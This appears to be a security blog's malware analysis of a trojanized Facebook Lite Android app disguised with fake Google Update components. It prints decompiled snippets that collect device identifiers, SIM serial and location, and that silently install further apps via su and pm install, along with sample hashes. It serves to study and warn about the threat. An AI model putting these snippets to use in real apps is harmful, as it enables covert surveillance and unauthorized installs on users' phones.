A version of the popular mobile app Facebook has been found to be infected with what we detect as Android/Trojan.Spy.FakePlay.  Facebook Lite is a more compact version of the popular app that uses less data and claims to work in all network conditions (i.e. where network conditions are poor).

The infected Facebook Lite works as advertised, but with the addition of malicious activities. It does this by using a malicious receiver com.google.update.LaunchReceiver and service com.google.update.GetInst.  Note the use of using a receiver and service name that attempts to hide under what some may think is Google Update; something an untrained eye may not catch.

Service com.google.update.LaunchReceiver runs whenever the phone is booted, and immediately runs receiver com.google.update.GetInst.

Log entry from Android Device Monitor

Receiver com.google.update.GetInst contains the bulk of the malicious code.  Below are some chunks of code that steal personal information, and installs additional malicious apps.

Code that steals and sends device ID, System Version, MAC address, Phone Model, Location, etc: WifiInfo localWifiInfo = ((WifiManager)getSystemService("wifi")).getConnectionInfo(); HashMap localHashMap = new HashMap(); localHashMap.put("DeviceId", paramTelephonyManager.getDeviceId()); localHashMap.put("SystemVersion", Build.VERSION.RELEASE); localHashMap.put("Mac", localWifiInfo.getMacAddress()); localHashMap.put("PhoneType", Build.MODEL); localHashMap.put("NetworkOperatorName", paramTelephonyManager.getNetworkOperatorName()); localHashMap.put("SimSerialNumber", paramTelephonyManager.getSimSerialNumber()); localHashMap.put("Location", a());

Code to install additional apps: localProcess = Runtime.getRuntime().exec("su"); PrintWriter localPrintWriter = new PrintWriter(localProcess.getOutputStream()); localPrintWriter.println("chmod 777 " + paramString); localPrintWriter.println("export LD_LIBRARY_PATH=/vendor/lib:/system/lib"); localPrintWriter.println("pm install -r  " + paramString); localPrintWriter.flush(); localPrintWriter.close();

The literal meaning of Trojan when it comes to computing is quote from Wikipedia any malicious computer program which is used to hack into a computer by misleading users of its true intent.  This particular piece of mobile malware is a perfect example; it misleads by infecting a legit app with malicious code and then hides its presence under the name of well-known corporation.

This infected version of Facebook Lite originates from China based on characters found in the code. China does not have access to Google Play and relies on third party apps stores that sometimes contain malicious apps like this.  If you in a country that has access to Google Play, we suggest using it over third party apps stores to avoid such infections.  Stay safe out there!

Malicious MD5 samples: 5345429AB24BB132CFAACE51EFF63C84 628235E3C56651C72326D8F5C713DBC6